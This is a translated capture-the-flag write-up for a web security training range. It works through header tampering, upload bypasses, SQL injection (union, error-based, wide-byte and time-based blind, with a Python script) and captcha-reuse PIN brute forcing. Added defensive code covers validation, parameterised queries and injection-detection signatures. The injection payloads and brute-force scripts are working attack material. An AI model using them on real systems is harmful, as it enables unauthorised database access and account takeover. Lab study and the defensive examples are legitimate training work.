Network Security Lab Range Write-up Summary

Author: hxf981224 Category: Uncategorized Published: 2019-10-15 17:03

I. Basics Stage

Challenge 3: base64 decoding


Script:

 import base64

 code = "解密内容"  # placeholder: paste the challenge's base64 string here
 count = 0
 try:
     # keep decoding until the result is no longer valid base64;
     # b64decode raises binascii.Error, and code keeps the last successful result
     while True:
         code = base64.b64decode(code)
         count += 1
 except Exception:
     print(count, code)

Challenge 4: They say MD5 is very secure. Is it really?

e0960851294d7b2253978ba858e24633

The MD5 hash reverses to bighp (via a lookup table; MD5 is not decrypted, the preimage is simply already known)

Challenge 5: Racial discrimination

URL: http://lab1.xseclab.com/base1_0ef337f3afbe42d5619d7a36c19c20ab/index.php

Burp Suite: intercept the request and modify the language header (Accept-Language)

Challenge 6: HAHA browser

Word has it that the information security team recently released a new browser called the HAHA browser, and some challenges can only be answered correctly through it. Xiaoming firmly refuses to install the HAHA browser for fear of a backdoor, so how can he pass a challenge that requires the HAHA browser to be installed?

URL: http://lab1.xseclab.com/base6_6082c908819e105c378eb93b6631c4d3/index.php

Burp Suite interception: modify the User-Agent header

Challenge 7: Where exactly is the key?

Last time Xiaoming found the key easily and felt such a simple challenge was boring, so here is the enhanced version of finding the key. Where will the key be hidden this time?

URL: http://lab1.xseclab.com/base7_eb68bd2f0d762faf70c89799b3c1cc52/index.php

Burp Suite interception: send the request to the Repeater module, click Go and inspect the Raw response

Challenge 8: The key can't be found again

Set up Burp Suite interception: send the request to Repeater, click Go; the Raw response reveals search_key.php

URL: http://lab1.xseclab.com/base8_0abd63aa54bef0464289d6a42465f354/key_is_here_now_.php

Challenge 9: Impersonate a logged-in user

Open Burp Suite, enable interception, send the request to the Repeater module and change the cookie to login=1

Key obtained:

Challenge 10: Compare number sizes

You only need to be bigger than the number on the server! Typing a string into the box shows that at most three characters are accepted, so modify the maxlength attribute

Then enter a number with five or more digits and the flag is displayed

Challenge 12: Just won't let you access it

Check the robots.txt file

Visit URL: http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b//9fb97531fe95594603aff7e794ab2f5f/login.php

Upload Stage

Challenge 1: Please upload a jpg image

Challenge address: http://lab1.xseclab.com/upload1_a4daf6890f1166fd88f386f098b182af/

Right-click and view the page source

 <html>
  <head>
  <meta http-equiv=Content-Type content="text/html;charset=utf-8">
  <title>upload 1</title>
  <script>
  function check(){
  var filename=document.getElementById("file");
  var str=filename.value.split(".");
  var ext=str[str.length-1];
  if(ext=='jpg'){
  return true;
  }else{
  alert("请上传一张JPG格式的图片!")
  return false;
  }
  return false;
  }
  </script>
  </head>
  <body>
  请上传一张JPG格式的图片!
  <form action="upload_file.php" method="post" enctype="multipart/form-data" onsubmit="return check()">
  <label for="file">文件名</label>
  <input type="file" name="file" id="file" />
  <br />
  <input type="submit" name="submit" value="上传" />
  </form>
  </body>
 </html>

It is only a front-end check: set up Burp Suite interception and modify the upload type

1. Upload a .jpg file and intercept the request

The flag pops up:

Challenge 2

Solved the same way as challenge 1

Challenge 3

Source:

 <html>
  <head>
  <meta http-equiv=Content-Type content="text/html;charset=utf-8">
  <title>upload 1</title>
  <script>
  function check(){
  var filename=document.getElementById("file");
  var str=filename.value.split(".");//以点为分割线,分割为数组
  var ext=str[1];//去第二个元素
  if(ext==='jpg'){
  return true;
  }else{
  alert("请上传一张JPG格式的图片!");
  return false;
  }
  return false;
  }
  </script>
  </head>
  <body>
  请上传一张JPG格式的图片!
  <form action="upload_file.php" method="post" enctype="multipart/form-data" onsubmit="return check()">
  <label for="file">文件名</label>
  <input type="file" name="file" id="file" />
  <br />
  <input type="submit" name="submit" value="上传" />
  </form>
  </body>
 </html>

So open Burp Suite and set up interception

Upload a file whose name contains an extra .jpg. segment (so str[1] is jpg) and intercept the request
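The upload challenges above all rely on a check that runs in the browser, and challenge 3's check() additionally reads the wrong array element. The following added example (my own code, not the lab's) replicates that client-side logic next to the server-side validation a defender should apply instead: only the last extension counts, it is compared case-insensitively against an allowlist, the content must carry the JPEG magic bytes, and the file is stored under a server-chosen name. The sample uploads are constructed inline.

```python
import os

# Added example, not the challenge's own code. The challenge-3 JavaScript splits the
# file name on "." and trusts index 1, so "shell.jpg.php" passes. A client-side check
# is a usability feature, not a security control; the server must validate the upload.

ALLOWED_EXTENSIONS = {"jpg", "jpeg"}
JPEG_MAGIC = b"\xff\xd8\xff"  # every JPEG/JFIF file starts with these three bytes


def client_style_check(filename: str) -> bool:
    """Replicates the page's check(): ext = filename.split('.')[1] == 'jpg'."""
    parts = filename.split(".")
    return len(parts) > 1 and parts[1] == "jpg"


def server_side_check(filename: str, content: bytes) -> bool:
    """Server-side validation a defender should apply instead:
    - only the base name is considered (no directory components),
    - the *last* extension decides, compared case-insensitively against an allowlist,
    - the content must actually start with the JPEG magic bytes.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        return False
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False
    return content.startswith(JPEG_MAGIC)


def safe_storage_name(filename: str) -> str:
    """Store under a random server-chosen name, keeping only the validated extension."""
    ext = os.path.basename(filename).rsplit(".", 1)[1].lower()
    return f"{os.urandom(8).hex()}.{ext}"


if __name__ == "__main__":
    # Constructed sample uploads for demonstration.
    fake_jpeg = JPEG_MAGIC + b"\x00" * 16
    not_an_image = b"<?php echo 'not an image'; ?>"
    for name, body in [("cat.jpg", fake_jpeg),
                       ("shell.jpg.php", not_an_image),
                       ("CAT.JPG", fake_jpeg),
                       ("cat.jpg", not_an_image)]:
        print(f"{name:15s} client={client_style_check(name)!s:5s} "
              f"server={server_side_check(name, body)}")
```

The magic-byte check is a cheap content check, not a full parser; for production uploads, re-encode the image with an image library so that anything the decoder does not understand is discarded.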

Injection Stage

Challenge 1: The simplest SQL injection

Challenge address: http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php

Universal-password bypass: admin' or 1=1# ; there is no filtering at all

Challenge 2: The simplest SQL injection (getting familiar with the injection environment)

Challenge URL: http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php

The page source contains the hint id=1

Construct the payload id=1 or 1=1

Challenge 3: Anti-injection (wide-byte injection)

URL: http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php

Source:

 <html>
     <head>
         <title>SQLi4_article</title>
     </head>
     <body>      <div>
             <h2>blog system</h2>
             <div class="content">my blog test</div>
         </div>
                 
     </body>
 </html>
 <!-- tips: id=1

payload: id=1%df'%23

1: Extract the database name

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,2,database()%23

2: Extract the table names

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

3: Extract the column names

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7361655f757365725f73716c6934%23

4: Extract the table contents

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,group_concat(id,title_1,content_1),3 from sae_user_sqli4%23
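Why does the %df' prefix defeat the lab's "anti-injection" filter? The escaping layer inserts a backslash before the quote, but a connection configured for GBK then reads the byte pair 0xDF 0x5C as one two-byte character, so the backslash disappears and the quote is live again. The added example below (my own code, not the lab's) reproduces that byte-level effect with an addslashes() look-alike and shows that a parameterised query is unaffected; the "server" is an in-memory SQLite table constructed inline, used only because the issue is in how the escaped bytes are interpreted, not in a particular database.

```python
import sqlite3

# Added example, not the challenge's own code. Demonstrates the wide-byte problem
# behind the id=1%df'%23 payload and the parameterised-query fix. The database is a
# constructed in-memory SQLite table, not the lab's MySQL instance.


def addslashes(s: str) -> str:
    """Mimics PHP addslashes()/magic_quotes: backslash-escape quotes and backslashes."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def as_seen_by_gbk_server(user_input: str) -> str:
    """Escape the input, then interpret the resulting bytes as GBK, which is what a
    connection with character_set_client=gbk does. 0xDF is a valid GBK lead byte and
    0x5C (the backslash) a valid trail byte, so the escaping backslash is swallowed
    into a two-byte character and the quote that follows is no longer escaped."""
    escaped = addslashes(user_input)
    raw = escaped.encode("latin-1")  # a URL-decoded %df arrives as the single byte 0xDF
    return raw.decode("gbk", errors="replace")


def quote_is_live(user_input: str) -> bool:
    """True if, after escaping and GBK decoding, a single quote survives unescaped."""
    s = as_seen_by_gbk_server(user_input)
    i = s.find("'")
    return i >= 0 and (i == 0 or s[i - 1] != "\\")


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the blog's article table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id TEXT, title TEXT)")
    conn.execute("INSERT INTO article VALUES ('1', 'my blog test')")
    return conn


def lookup_parameterised(conn: sqlite3.Connection, article_id: str):
    """The fix: never splice user input into SQL text; bind it as a parameter."""
    return conn.execute(
        "SELECT id, title FROM article WHERE id = ?", (article_id,)
    ).fetchall()


if __name__ == "__main__":
    for value in ["1'", "1\xdf'"]:
        print(repr(value), "->", repr(as_seen_by_gbk_server(value)),
              "quote live:", quote_is_live(value))
    conn = build_demo_db()
    print(lookup_parameterised(conn, "1"))
    print(lookup_parameterised(conn, "1\xdf'"))
```

Two defensive consequences follow: escaping functions are only safe when they know the connection's real character set (in PHP's mysqli, set it with mysqli_set_charset() rather than a SET NAMES query, which the client library does not see), and prepared statements with bound parameters remove the problem entirely because the input is never parsed as SQL.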

Challenge 4: Can it echo at all? (limit restriction)

URL: http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1

1: Extract the database name

2: Extract the table names

 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database()))),1)%23&num=1

3: Extract the column names

 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(column_name)from information_schema.columns where table_name=0x75736572))),1)%23&num=1

4: Extract the table contents // restricted: only one field can be queried at a time

 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database()))),1)%23&num=1

Challenge 5: Encounter (wide-byte injection in the image request header)

URL: http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/

Visit the image URL and intercept with Burp Suite: the injection goes into the request header

Challenge 6: ErrorBased (error-based injection)

URL: http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin

payload: username=admin' %23

1: Extract the database name

2: Extract the table names:

 ?username=admin' and (select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1))%23

3: Extract the field names

 ?username=admin' and (select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='motto'),0x7e),1))%23

4: Extract the table contents

Challenge 7: Blind injection

Test request:

 http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and (sleep(5))%23

Script:

 # coding=utf-8
 import time
 import requests

 db_len = 0
 url = 'http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'
 # probe the database name length: the server only sleeps once db_len reaches the real length
 while True:
     db_len += 1
     payload = url + "'" + "and if(length(database())>{0},1,sleep(3))%23".format(db_len)
     print(payload)
     start_time = time.time()
     res = requests.get(payload).text
     stop_time = time.time()
     if (stop_time - start_time) > 2.5:
         break

 print("database_length", db_len)


 # guess the database name one character at a time; the first c that triggers
 # the sleep is the character's ASCII code (range(8) replaced by the probed length)
 db_name = ""
 for i in range(db_len):
     for c in range(32, 127):
         payload = url + "'" + "and if(ascii(substr(database(),{0},1))>{1},1,sleep(3))%23".format(i + 1, c)
         print(payload)
         start_time = time.time()
         res = requests.get(payload).text
         stop_time = time.time()
         if (stop_time - start_time) > 2.5:
             db_name += chr(c)
             print(db_name)
             break

Challenge 8: Generic SQL injection protection

Points: 250

Xiaoming wrote a blog system and, to prevent injection, found a generic SQL injection protection module online; both GET and POST are filtered!

URL: http://lab1.xseclab.com/sqli8_f4af04563c22b18b51d9142ab0bfb13d/index.php?id=1

At first I had no idea where to start, but after reading an expert's write-up I learned that sqlmap can be used to locate the injection point, which turns out to be in the cookie:
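Every technique in this stage (union-select enumeration of information_schema, the procedure analyse / extractvalue trick, updatexml error-based extraction, sleep()-based blind probing, and the %df' wide-byte prefix) leaves a recognisable trace in the web server's access log. The added example below (my own code, not part of the write-up) is a small detector that URL-decodes the request target and matches those traces over a handful of constructed Apache-style log lines, counting hits per source address. It is meant as a starting point for a detection rule, not as a substitute for fixing the queries.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Added example, not the page's code: detection logic for the injection patterns used
# in this stage, run over constructed sample access log lines.

SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S),
    "information_schema": re.compile(r"information_schema\.(tables|columns)", re.I),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "procedure_analyse": re.compile(r"\bprocedure\s+analyse\s*\(", re.I),
    "wide_byte_quote": re.compile(r"[\x81-\xfe]'"),  # e.g. %df' once decoded
}

# Common Log Format: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_target(target: str) -> str:
    """URL-decode once. latin-1 keeps %df as a single high byte so the wide-byte
    signature can see it; a UTF-8 multibyte character followed by a quote would also
    match, which is an acceptable false positive for a triage rule."""
    return unquote_plus(target, encoding="latin-1")


def scan_line(line: str):
    """Return {"ip", "target", "hits"} for a parseable line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return {"ip": m.group("ip"), "target": m.group("target"), "hits": hits}


def scan_log(lines):
    """Return (alerts, per_ip_counter) for the lines that matched a signature."""
    alerts, per_ip = [], Counter()
    for line in lines:
        r = scan_line(line)
        if r and r["hits"]:
            alerts.append(r)
            per_ip[r["ip"]] += 1
    return alerts, per_ip


# Constructed sample log lines (RFC 5737 test addresses); targets echo the stage's payloads.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Oct/2019:17:03:01 +0800] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [15/Oct/2019:17:03:02 +0800] "GET /index.php?id=1%df%27union%20select%201,2,database()%23 HTTP/1.1" 200 640',
    '203.0.113.5 - - [15/Oct/2019:17:03:03 +0800] "GET /index.php?username=admin%27%20and%20(select%20updatexml(1,concat(0x7e,database()),1))%23 HTTP/1.1" 200 300',
    '203.0.113.5 - - [15/Oct/2019:17:03:09 +0800] "GET /blind.php?username=admin%27and%20if(length(database())%3E1,1,sleep(3))%23 HTTP/1.1" 200 100',
    '203.0.113.5 - - [15/Oct/2019:17:03:12 +0800] "GET /index.php?start=0%20procedure%20analyse(extractvalue(rand(),concat(1,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()))),1)%23&num=1 HTTP/1.1" 200 300',
    '198.51.100.7 - - [15/Oct/2019:17:03:10 +0800] "GET /index.php?start=0&num=1 HTTP/1.1" 200 420',
]

if __name__ == "__main__":
    alerts, per_ip = scan_log(SAMPLE_LOG)
    for a in alerts:
        print(a["ip"], a["hits"], a["target"][:60])
    print(dict(per_ip))
```

Time-based blind probing is the hardest case for content signatures; if the log format includes the request duration (Apache's %D or nginx's $request_time), add a second rule for bursts of multi-second responses from one client to the same endpoint, which catches the sleep() pattern even when the keyword is obfuscated.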

Scripting Stage

Challenge 1: The key can't be found yet again

URL: http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php

View the page source
 <html>
     <head>
         <meta http-equiv="content-type" content="text/html;charset=utf-8">
     </head>
     <body>
         <a href="./search_key.php">_到这里找key__</a>
     </body>
 </html>

There is a search_key.php; opening it in the browser shows no key, so write a simple script

 import requests

 url = "http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/search_key.php"

 # fetch the raw response body instead of rendering it in a browser
 req = requests.get(url).text
 print(req)

Running the script reveals the key

Challenge 2: Quick mental arithmetic

URL: http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php

The challenge requires computing the result and submitting it within two seconds, so the only option is a script

Page source:
 <html>
     <head>
         <meta http-equiv=Content-Type content="text/html;charset=utf-8">
     </head>
     <body>
       
         <form action="" method="post">
             请在2秒内口算结果并提交!<br/>
             2828*38414+1564*(2828+38414)=<input type="text" name="v"/>
             <input type="submit" value="提交"/>
         </form>
     </body>
 </html>

Script:

 import requests
 import re

 url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
 s = requests.session()

 r = s.get(url)
 # scrape the arithmetic expression that precedes the answer box
 m = re.search(r'([0-9+\-*/() ]+?)=<input type="text" name="v"/>', r.text)
 red = m.group(1).strip()

 key = eval(red)  # the regex limits red to digits and arithmetic operators
 print(red)
 print(key)
 data = {"v": key}
 a = s.post(url, data=data).content.decode('utf-8')
 print(a)

Running the script returns the key
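The script above hands text scraped from the server straight to eval(), so whoever controls that page controls what the script executes; the regex narrows the damage but the habit is worth replacing. The following added example (my own code, not the write-up's script) extracts the expression the same way and then evaluates it with an AST walker that admits only integer constants and the four arithmetic operators, rejecting calls, attribute access and exponentiation. The sample HTML fragment is constructed from the form shown above.

```python
import ast
import operator
import re

# Added example, not the page's script: a restricted arithmetic evaluator to use in
# place of eval() on server-supplied text.

_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.FloorDiv: operator.floordiv,
}
_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def _eval_node(node):
    # Integer literal (bool is a subclass of int in Python, so exclude it explicitly)
    if isinstance(node, ast.Constant) and isinstance(node.value, int) \
            and not isinstance(node.value, bool):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    # Anything else (Call, Attribute, Name, Pow, comparisons, ...) is refused
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def safe_eval(expr: str) -> int:
    """Evaluate integer arithmetic only; raises ValueError for anything else."""
    tree = ast.parse(expr.strip(), mode="eval")
    return _eval_node(tree.body)


def rejects(expr: str) -> bool:
    """True if safe_eval refuses the expression (used to show what is blocked)."""
    try:
        safe_eval(expr)
    except (ValueError, SyntaxError):
        return True
    return False


EXPR_RE = re.compile(r'([0-9+\-*() ]+?)=<input type="text" name="v"/>')


def extract_expression(html: str) -> str:
    """Pull the arithmetic prompt out of the challenge form."""
    m = EXPR_RE.search(html)
    if not m:
        raise ValueError("no arithmetic prompt found")
    return m.group(1).strip()


# Constructed fragment modelled on the challenge page's form.
SAMPLE_HTML = (
    '<form action="" method="post">\n'
    '    请在2秒内口算结果并提交!<br/>\n'
    '    2828*38414+1564*(2828+38414)=<input type="text" name="v"/>\n'
    '</form>'
)

if __name__ == "__main__":
    expr = extract_expression(SAMPLE_HTML)
    print(expr, "=", safe_eval(expr))
    print("eval-style payload rejected:", rejects("__import__('os').system('id')"))
```

The same pattern applies to any scraper that "just evaluates" a server-provided string: parse it into a data structure first, then interpret only the node types you expect.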

Challenge 3: This challenge is empty

Tips: this challenge really was not set up at random. What exactly is empty? Challenge address: none, just submit the answer directly (lowercase is fine)

Enter null in the input box to get the key

Challenge 5: Silly captcha, part 1

Source:
 <html>
     <head>
         <meta http-equiv="content-type" content="text/html;charset=utf-8">
     </head>
     <body>
        登陆密码是4位纯数字数,第一位不为0
    <form action="login.php" method="POST">
            User: <input type="text" value="admin" name="username"><br>
            Password: <input type="password" value="" name="pwd"><br>
            Vcode: <input type="text" value="" name="vcode"><br>
             <img src="http://vc.sinaapp.com/img.php?key=k-15692259986111"><br>
             <input type="submit" value="submit" name="submit"><br>
         </form>
     </body>
 </html>

From the source, the verification-code image is loaded from an external URL:

Intercept the packet with Burp Suite

After several submissions it turns out the captcha does not change as long as the Cookie stays the same, which suggests the captcha is tied to a session (Session)

Script:

 import requests
 import re
 from PIL import Image

 url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php"
 login_url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"

 s = requests.session()  # one session: the captcha stays valid while the cookie is unchanged

 r = s.get(url).text

 # pull the captcha image URL out of the form
 p = re.search(r'<img src="(.*?)"><br>', r).group(1)
 print(p)
 p1 = requests.get(p)
 with open('1.jpg', 'wb') as f:
     f.write(p1.content)
 im = Image.open('1.jpg')
 im.show()
 print("请输入验证码:")
 vcode = input()
 # the password is four digits with a non-zero first digit
 for i in range(1000, 10000):
     data = {"username": "admin", "pwd": str(i), "vcode": vcode, "submit": "submit"}
     key = s.post(login_url, data=data).text
     print("try:" + str(i))
     if "error" not in key:
         print(key)
         break

Running the script yields the key

Method 2: brute-force with Burp Suite

The brute-force result is 1238

Challenges 6 and 7

Same as challenge 5, except the captcha is set to empty and then brute-forced
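The three captcha challenges fail for two server-side reasons: one human solve stays valid for the whole session, so a script can reuse it for every PIN guess, and (in 6 and 7) an empty captcha is accepted. The added example below (my own code, not the lab's) is a minimal in-memory login guard showing the controls that close both holes: a captcha is consumed on first use whether or not the login succeeds, a missing captcha is rejected, and a session is locked after a few failures. reuse_captcha_attack() replays the write-up's approach against it so the effect is visible; the clock is injectable only to keep the demonstration deterministic.

```python
import secrets
import time

# Added example, not the challenge's code: server-side handling that defeats the
# "solve once, reuse the captcha for every guess" pattern from the vcode challenges.

MAX_FAILURES = 5
LOCK_SECONDS = 300


class LoginGuard:
    def __init__(self, password: str, clock=time.time):
        self._password = password
        self._clock = clock
        self._captchas = {}   # session_id -> expected captcha text (single use)
        self._failures = {}   # session_id -> (failure count, locked_until timestamp)

    def issue_captcha(self, session_id: str) -> str:
        """Issue a fresh captcha; any earlier one for the session is discarded."""
        code = "".join(secrets.choice("0123456789") for _ in range(4))
        self._captchas[session_id] = code
        return code

    def attempt(self, session_id: str, pwd: str, vcode: str) -> str:
        """Returns 'locked', 'bad_captcha', 'bad_password' or 'ok'."""
        _, locked_until = self._failures.get(session_id, (0, 0.0))
        if self._clock() < locked_until:
            return "locked"
        # Consume the captcha on every attempt, successful or not.
        expected = self._captchas.pop(session_id, None)
        if not vcode or expected is None or \
                not secrets.compare_digest(vcode.encode(), expected.encode()):
            self._record_failure(session_id)
            return "bad_captcha"
        if not secrets.compare_digest(pwd.encode(), self._password.encode()):
            self._record_failure(session_id)
            return "bad_password"
        self._failures.pop(session_id, None)
        return "ok"

    def _record_failure(self, session_id: str) -> None:
        count, _ = self._failures.get(session_id, (0, 0.0))
        count += 1
        locked_until = self._clock() + LOCK_SECONDS if count >= MAX_FAILURES else 0.0
        self._failures[session_id] = (count, locked_until)


def reuse_captcha_attack(guard: LoginGuard, session_id: str, pins):
    """Mimics the write-up's script: one captcha solve, then many PIN guesses."""
    vcode = guard.issue_captcha(session_id)
    return [guard.attempt(session_id, pin, vcode) for pin in pins]


if __name__ == "__main__":
    guard = LoginGuard("1238")  # the PIN the write-up recovered, used here as sample data
    print(reuse_captcha_attack(guard, "demo-session", [str(n) for n in range(1000, 1008)]))
```

Locking by session alone is not enough on its own, since a client can simply drop the cookie; in a real deployment the failure counter should also be keyed by account and by source address, and the captcha should expire after a short time even if never used.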

Challenge 8: Just smile and you pass

URL: http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php

Page source
 <!doctype html>
 <html lang="en">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 <title>Show me your smile :)</title>
 <link rel="stylesheet" href="style.css">
 </head>
 <body>
 <br><br><br><br><br><br><br>
 <div class="loginform cf">
     <form name="login" action="index.php" method="POST" accept-charset="utf-8">
         <ul>
             <li>
                 <label for="SMILE">请使用微笑过关<a href="?view-source">源代码</a></label>
                 <input type="text" name="T_T" placeholder="where is your smile" required>
             </li>
             <li><input type="submit" value="Show"> </li>
         </ul>
     </form>
 </div>
 <div style="text-align:center;clear:both">
 </div>
 </body>
 </html>

The source reveals a ?view-source parameter; opening that page shows the PHP source

 <?php
     header("Content-type: text/html; charset=utf-8");
     if (isset($_GET['view-source'])) {
         show_source(__FILE__);
         exit();
     }

     include('flag.php');

     $smile = 1;

     if (!isset ($_GET['^_^'])) $smile = 0;
     if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;
     if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;
     if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;
     if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;
     if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;
     if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;
     if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;
     if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0;
     if ($smile) {
         if (@file_exists ($_GET['^_^'])) $smile = 0;
     }
     if ($smile) {
         $smile = @file_get_contents ($_GET['^_^']);//file_get_contents() reads an entire file into a string
         if ($smile === "(●'◡'●)") die($flag);
     }
 ?>
 <!doctype html>
 <html lang="en">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 <title>Show me your smile :)</title>
 <link rel="stylesheet" href="style.css">
 </head>
 <body>
 <br><br><br><br><br><br><br>
 <div class="loginform cf">
     <form name="login" action="index.php" method="POST" accept-charset="utf-8">
         <ul>
             <li>
                 <label for="SMILE">请使用微笑过关<a href="?view-source">源代码</a></label>
                 <input type="text" name="T_T" placeholder="where is your smile" required>
             </li>
             <li><input type="submit" value="Show"> </li>
         </ul>
     </form>
 </div>
 <div style="text-align:center;clear:both">
 </div>
 </body>
 </html>

The parameter is ^_^, but the checks below filter it

We need to assign a value to "^_^" while also getting rid of the "_" in "^_^", so URL-encode it as "%5f"; the input should therefore be "^%5f^".

The code filters out http, https, ftp and telnet, yet the value of $_GET['^_^'] has to be read through file_get_contents(), while $_GET['^_^'] must not exist as a file. So $_GET['^_^'] can only be the string "(●'◡'●)" and cannot be a file name. What, then, should the argument to file_get_contents() be? A quick search shows that data:// fits perfectly, so the input should be "^%5f^=data:,(●'◡'●)".
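Two defensive lessons sit in that PHP: the underscore check looks at the raw QUERY_STRING while the application reads the URL-decoded $_GET key, so the two views of the input disagree, and the http/https/ftp/telnet checks are substring matches that say nothing about other stream wrappers such as data:. The added example below (my own code, not the challenge's) shows the raw-versus-decoded mismatch with Python's parse_qs standing in for PHP's $_GET, and then a canonicalise-then-validate check that rejects any value carrying a URL scheme. The parameter name ^_^ is taken from the page; the accepted/rejected verdict strings are my own.

```python
from urllib.parse import parse_qs, urlsplit

# Added example, not the challenge's code: validate the decoded (canonical) value,
# not the raw query string, and refuse URL schemes / stream wrappers outright.


def raw_filter_passes(raw_qs: str) -> bool:
    """The page's check: no literal underscore in the raw QUERY_STRING."""
    return "_" not in raw_qs


def decoded_params(raw_qs: str) -> dict:
    """What the application actually sees after URL decoding (like PHP's $_GET).
    Only the first value per name is kept, which matches PHP's behaviour here."""
    return {k: v[0] for k, v in parse_qs(raw_qs, keep_blank_values=True).items()}


def canonical_filter_passes(raw_qs: str) -> bool:
    """The same underscore rule, applied after decoding, to keys and values alike."""
    return not any("_" in k or "_" in v for k, v in decoded_params(raw_qs).items())


def wrapper_scheme(value: str) -> str:
    """Return the URL scheme of a would-be file argument ('' for a plain name).
    Catches data:, http:, ftp: and every other wrapper without listing them."""
    return urlsplit(value).scheme.lower()


def file_argument_verdict(raw_qs: str, name: str = "^_^") -> str:
    """Canonicalise first, then decide. Order: presence, wrapper scheme, underscore rule."""
    value = decoded_params(raw_qs).get(name)
    if value is None:
        return "rejected: parameter missing"
    scheme = wrapper_scheme(value)
    if scheme:
        return f"rejected: stream wrapper '{scheme}'"
    if not canonical_filter_passes(raw_qs):
        return "rejected: underscore present after decoding"
    return "accepted"


if __name__ == "__main__":
    qs = "^%5f^=data:,(●'◡'●)"
    print("raw filter passes:", raw_filter_passes(qs))
    print("decoded view:", decoded_params(qs))
    print("verdict:", file_argument_verdict(qs))
```

The general rule: every check must run on the same representation of the input that the sensitive call will use, and a file-reading function should never receive a user-controlled string that can name a wrapper at all.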

Challenge 10: Silly phone verification code

The verification code issued for 66 can be used on 67, so request the code with 66 and then log in with 67 and that code


Comprehensive Stage

Challenge 1: Penetration test

Note: this challenge simulates a real environment and is therefore exclusive; please choose a suitable time slot to complete it. You only have one usable phone; the phone number is given on the pages that need it. Challenge address

The page offers three options: login, forgot password and register user

Click forgot password and view the page source

After entering a username and phone number no verification code can be obtained, so we go to the registration page and register our own user; after successful registration it redirects to

We just found a phone number in the page source, so we bind that phone number and intercept the request,

The response says the phone number was bound successfully; back on the main page, go to forgot password and recover the password

Log in again and the key is obtained
